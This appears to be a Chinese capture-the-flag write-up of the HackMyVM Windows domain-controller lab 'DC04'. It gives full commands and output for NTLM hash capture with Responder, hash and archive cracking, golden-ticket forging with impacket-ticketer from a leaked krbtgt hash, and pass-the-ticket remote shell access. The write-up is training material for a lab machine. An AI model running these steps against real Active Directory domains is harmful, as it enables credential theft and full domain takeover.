---

created: 2024-12-04 23:08
tags:

• HMV
• 黃金票據(jù)
• PTT
• ntlm中毒
  難度: ??????????
  作者: josemlwdf
  系統(tǒng): Windows

---

1. 基本信息^toc

2. 信息收集

2.1. 端口掃描

┌──(root?kali)-[/home/kali/hmv/dc04]
└─# fscan -h 192.168.69.4___                              _/ _ \     ___  ___ _ __ __ _  ___| | __/ /_\/____/ __|/ __| '__/ _`' |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\fscan version: 1.8.4
start infoscan
192.168.69.4:139 open
192.168.69.4:80 open
192.168.69.4:135 open
192.168.69.4:445 open
192.168.69.4:88 open
[*] alive ports len is: 5
start vulscan
[*] NetBios 192.168.69.4    [+] DC:SOUPEDECODE\DC01
[*] NetInfo
[*]192.168.69.4[->]DC01[->]192.168.69.4
[*] WebTitle http://192.168.69.4       code:302 len:0      title:None 跳轉(zhuǎn)url: http://soupedecode.local
已完成 5/5
[*] 掃描結(jié)束,耗時(shí): 3.264268642s┌──(root?kali)-[/home/kali/hmv/dc04]
└─# nmap -sCV 192.168.69.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 23:13 CST
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 23:13 (0:00:00 remaining)
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 23:13 (0:00:00 remaining)
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 23:13 (0:00:00 remaining)
Nmap scan report for 192.168.69.4
Host is up (0.00027s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://soupedecode.local
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-05 07:13:38Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
MAC Address: 08:00:27:13:99:85 (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: 15h59m57s
| smb2-time:
|   date: 2024-12-05T07:13:38
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:13:99:85 (Oracle VirtualBox virtual NIC)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.93 seconds

配置hsots
192.168.56.126 soupedecode.local DC01.soupedecode.local

2.2. 目錄掃描

[01:20:17] 200 -   10KB - /server-status/
[01:20:17] 200 -   10KB - /server-status
[01:20:18] 200 -  100KB - /server-info

用dirsearch可以掃出來三個(gè)路徑
訪問后里面可以找到一個(gè)子域名 heartbeat.soupedecode.local 添加到hosts里面

2.3. 網(wǎng)址利用

訪問后可以發(fā)現(xiàn)是一個(gè)登錄框

利用burp進(jìn)行爆破一下

這個(gè)機(jī)子很垃圾，爆破了幾下就出問題了。后面怎么都爆破都是403了。重啟也沒有用，只能重新安裝了
建議還是啟動(dòng)了就保存一下快照

最后報(bào)出來賬號密碼是 admin:nimda
登錄成功后會(huì)要求你輸入ip地址

3. websvc用戶

3.1. NTLM中毒攻擊

輸入我們kali的ip然后進(jìn)行監(jiān)聽
可以獲取到一個(gè)NTLMhash

┌──(root?kali)-[/home]
└─# responder -I eth1
[SMB] NTLMv2-SSP Client   : 192.168.56.126
[SMB] NTLMv2-SSP Username : soupedecode\websvc
[SMB] NTLMv2-SSP Hash     : websvc::soupedecode:3d80cf0d5de8656a:911B4595F70D957A0671068267CDF165:010100000000000000F21251F450DB01006098D655A71BC1000000000200080054004E0039004B0001001E00570049004E002D0032003200470032004D003200310036004B004100340004003400570049004E002D0032003200470032004D003200310036004B00410034002E0054004E0039004B002E004C004F00430041004C000300140054004E0039004B002E004C004F00430041004C000500140054004E0039004B002E004C004F00430041004C000700080000F21251F450DB01060004000200000008003000300000000000000000000000004000007EB2E40733876D4CE24083BC1F55F4CD7B7D843B3B343F98128E45BD39583DFF0A001000000000000000000000000000000000000900220063006900660073002F003100390032002E003100360038002E00350036002E0035000000000000000000

破解hash

hashcat hash.txt rockyou.txtWEBSVC::soupedecode:3d80cf0d5de8656a:911b4595f70d957a0671068267cdf165:010100000000000000f21251f450db01006098d655a71bc1000000000200080054004e0039004b0001001e00570049004e002d0032003200470032004d003200310036004b004100340004003400570049004e002d0032003200470032004d003200310036004b00410034002e0054004e0039004b002e004c004f00430041004c000300140054004e0039004b002e004c004f00430041004c000500140054004e0039004b002e004c004f00430041004c000700080000f21251f450db01060004000200000008003000300000000000000000000000004000007eb2e40733876d4ce24083bc1f55f4cd7b7d843b3b343f98128e45bd39583dff0a001000000000000000000000000000000000000900220063006900660073002f003100390032002e003100360038002e00350036002e0035000000000000000000:jordan23Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: WEBSVC::soupedecode:3d80cf0d5de8656a:911b4595f70d95...000000
Time.Started.....: Wed Dec 18 02:39:31 2024 (0 secs)
Time.Estimated...: Wed Dec 18 02:39:31 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: jordan23 [8]
Guess.Queue......: 350/14336793 (0.00%)
Speed.#1.........:     4949 H/s (0.00ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: jordan23 -> jordan23
Hardware.Mon.#1..: Util: 16%Started: Wed Dec 18 02:38:56 2024
Stopped: Wed Dec 18 02:39:32 2024

獲取到一對賬號密碼 WEBSVC ：jordan23

3.2. smb探測

┌──(root?kali)-[~/Desktop/hmv/dc04]
└─# crackmapexec smb 192.168.56.126 -u websvc -p jordan23 --sharesSMB         192.168.56.126  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         192.168.56.126  445    DC01             [-] SOUPEDECODE.LOCAL\websvc:jordan23 STATUS_PASSWORD_EXPIRED

密碼是對的 只是過期了。 上Vbox更新一下密碼即可

我這里修改后的密碼是 admin!@#45
重新檢測一下

┌──(root?kali)-[~/Desktop/hmv/dc04]
└─# crackmapexec smb 192.168.56.126 -u websvc -p 'admin!@#45' --sharesSMB         192.168.56.126  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         192.168.56.126  445    DC01             [+] SOUPEDECODE.LOCAL\websvc:admin!@#45
SMB         192.168.56.126  445    DC01             [+] Enumerated shares
SMB         192.168.56.126  445    DC01             Share           Permissions     Remark
SMB         192.168.56.126  445    DC01             -----           -----------     ------
SMB         192.168.56.126  445    DC01             ADMIN$                          Remote Admin
SMB         192.168.56.126  445    DC01             C               READ
SMB         192.168.56.126  445    DC01             C$                              Default share
SMB         192.168.56.126  445    DC01             IPC$            READ            Remote IPC
SMB         192.168.56.126  445    DC01             NETLOGON        READ            Logon server share
SMB         192.168.56.126  445    DC01             SYSVOL          READ            Logon server share

在 websvc 用戶下可以獲取到userflag

┌──(root?kali)-[~/Desktop/hmv/dc04]
└─# cat user.txt
709e449a996a85aa7deaf18c79515d6a  

而且也可以發(fā)現(xiàn)一些用戶的目錄

smb: \users\> ls.                                  DR        0  Wed Nov  6 20:55:53 2024..                                DHS        0  Tue Nov  5 18:30:29 2024Administrator                       D        0  Sat Jun 15 15:56:40 2024All Users                       DHSrn        0  Sat May  8 04:26:16 2021Default                           DHR        0  Sat Jun 15 22:51:08 2024Default User                    DHSrn        0  Sat May  8 04:26:16 2021desktop.ini                       AHS      174  Sat May  8 04:14:03 2021fjudy998                            D        0  Wed Nov  6 20:55:33 2024ojake987                            D        0  Wed Nov  6 20:55:16 2024Public                             DR        0  Sat Jun 15 13:54:32 2024rtina979                            D        0  Wed Nov  6 20:54:39 2024websvc                              D        0  Wed Nov  6 20:44:11 2024xursula991                          D        0  Wed Nov  6 20:55:28 2024

這里面的用戶我們需要著重關(guān)注。

rtina979
xursula991
fjudy998

4. rtina97用戶

4.1. rpc獲取用戶信息

┌──(root?kali)-[~/Desktop/hmv/dc04]
└─# rpcclient -U websvc%'admin!@#45' 192.168.56.126 -c "querydispinfo" |grep -E  'rtina979|xursula991|fjudy998'
index: 0x1330 RID: 0x80e acb: 0x00020010 Account: fjudy998      Name: Felix Judy        Desc: Music lover and aspiring guitarist
index: 0x131f RID: 0x7fd acb: 0x00020010 Account: rtina979      Name: Reed Tina Desc: Default Password Z~l3JhcV#7Q-1#M
index: 0x1329 RID: 0x807 acb: 0x00020010 Account: xursula991    Name: Ximena Ursula     Desc: Yoga practitioner and meditation lover

獲取到了 rtina979 用戶的默認(rèn)密碼 Z~l3JhcV#7Q-1#M

檢測一下是否可以使用

┌──(root?kali)-[~/Desktop/hmv/dc04]
└─# crackmapexec smb 192.168.56.126 -u rtina979 -p 'Z~l3JhcV#7Q-1#M'
SMB         192.168.56.126  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         192.168.56.126  445    DC01             [-] SOUPEDECODE.LOCAL\rtina979:Z~l3JhcV#7Q-1#M STATUS_PASSWORD_EXPIRED

可以使用。密碼過期了 上Vbox修改一下即可
這里我修改新密碼為 c1trus123

┌──(root?kali)-[~/Desktop/hmv/dc04]
└─# crackmapexec smb 192.168.56.126 -u rtina979 -p 'c1trus123'
SMB         192.168.56.126  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         192.168.56.126  445    DC01             [+] SOUPEDECODE.LOCAL\rtina979:c1trus123

┌──(root?kali)-[~/Desktop/hmv/dc04]
└─# smbmap -H 192.168.56.126 -u rtina979 -p c1trus123________  ___      ___  _______   ___      ___       __         _______/"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\(:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)\___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/__/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  //" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \(_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.comhttps://github.com/ShawnDEvans/smbmap[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)[+] IP: 192.168.56.126:445      Name: soupedecode.local         Status: AuthenticatedDisk                                                    Permissions     Comment----                                                    -----------     -------ADMIN$                                                  NO ACCESS       Remote AdminC                                                       READ ONLYC$                                                      NO ACCESS       Default shareIPC$                                                    READ ONLY       Remote IPCNETLOGON                                                READ ONLY       Logon server shareSYSVOL                                                  READ ONLY       Logon server share
[*] Closed 1 connections

在 rtina979 用戶的 Documents 目錄下可以獲取到一個(gè)文件 Report.rar

smb: \users\rtina979\Documents\> ls.                                  DR        0  Thu Nov  7 17:35:52 2024..                                  D        0  Wed Nov  6 20:54:39 2024My Music                        DHSrn        0  Wed Nov  6 20:54:39 2024My Pictures                     DHSrn        0  Wed Nov  6 20:54:39 2024My Videos                       DHSrn        0  Wed Nov  6 20:54:39 2024Report.rar                          A   712046  Thu Nov  7 08:35:49 202412942591 blocks of size 4096. 11014117 blocks available
smb: \users\rtina979\Documents\> get Report.rar
getting file \users\rtina979\Documents\Report.rar of size 712046 as Report.rar (11589.3 KiloBytes/sec) (average 11589.3 KiloBytes/sec)

4.2. 破解壓縮包

此壓縮包杯加密了 爆破一下

┌──(root?kali)-[~/Desktop/hmv/dc04]
└─#  rar2john Report.rar
Created directory: /root/.john
Report.rar:$rar5$16$7b74f4c32feb807c16edc906c283e524$15$872f8d1a914bd1503dac110c7bbb938a$8$3e15430028d503b5┌──(root?kali)-[~/Desktop/hmv/dc04]
└─#  rar2john Report.rar >hash.txt┌──(root?kali)-[~/Desktop/hmv/dc04]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (RAR5 [PBKDF2-SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
PASSWORD123      (Report.rar)
1g 0:00:00:33 DONE (2024-12-19 02:26) 0.02944g/s 1515p/s 1515c/s 1515C/s ang123..2pac4ever
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

成功爆破出密碼 PASSWORD123

4.3. 報(bào)告審計(jì)

解壓后是一個(gè)滲透測試報(bào)告
在報(bào)告的最后可以獲取到 krbtgt 的hash

5. 黃金票據(jù)

黃金票證是一種權(quán)限維持手段，攻擊者獲得了對Active Directory密鑰分發(fā)服務(wù)帳戶KRBTGT的控制權(quán)，并使用該帳戶偽造有效的Kerberos票證授予票證TGT。這使攻擊者能夠訪問Active Directory域上的任何資源，如果有KRBTGT哈希，您可以偽造自己的TGT，其中包括想要的任何組成員身份的PAC數(shù)據(jù)。

5.1. 利用條件

• 獲取域中krbtgt用戶使用的加密密鑰 （這里已經(jīng)獲取到了krbtgt用戶的NTLM hash）
• 目標(biāo)域名 域SID

我們現(xiàn)在獲取到了KRBTGT哈希 先驗(yàn)證一下是否是正確的

┌──(root?kali)-[~/Desktop/hmv/dc04]
└─# crackmapexec smb 192.168.56.126 -u krbtgt -H '0f55cdc40bd8f5814587f7e6b2f85e6f'
SMB         192.168.56.126  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         192.168.56.126  445    DC01             [-] SOUPEDECODE.LOCAL\krbtgt:0f55cdc40bd8f5814587f7e6b2f85e6f STATUS_ACCOUNT_DISABLED

很好是正確的

5.2. 獲取域SID

┌──(root?kali)-[~/Desktop/hmv/dc04]
└─# impacket-lookupsid soupedecode.local/rtina979:c1trus123@192.168.56.126 |grep SID
[*] Brute forcing SIDs at 192.168.56.126
[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164

5.3. 同步域時(shí)間

┌──(root?kali)-[~/Desktop/hmv/dc04]
└─# rdate -n 192.168.56.126
Thu Dec 19 19:05:54 EST 2024

5.4. 生成管理員的黃金票據(jù)

┌──(root?kali)-[~/Desktop/hmv/dc04]
└─# impacket-ticketer -nthash 0f55cdc40bd8f5814587f7e6b2f85e6f -domain-sid S-1-5-21-2986980474-46765180-2505414164 -domain soupedecode.local  administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies[*] Creating basic skeleton ticket and PAC Infos
/usr/share/doc/python3-impacket/examples/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for soupedecode.local/administrator
/usr/share/doc/python3-impacket/examples/ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
/usr/share/doc/python3-impacket/examples/ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/usr/share/doc/python3-impacket/examples/ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
/usr/share/doc/python3-impacket/examples/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in administrator.ccache

5.5. 導(dǎo)入票據(jù)到環(huán)境變量

export KRB5CCNAME=administrator.ccache

5.6. PTT

┌──(root?kali)-[~/Desktop/hmv/dc04]
└─# impacket-wmiexec soupedecode.local/administrator@dc01.soupedecode.local -k -target-ip 192.168.56.126
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companiesPassword:
[*] SMBv3.0 dialect used[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
C:\>id
'id' is not recognized as an internal or external command,
operable program or batch file.C:\>whoami
soupedecode.local\administratorC:\users\administrator\desktop>type root.txt
1c66eabe105636d7e0b82ec1fa87cb7a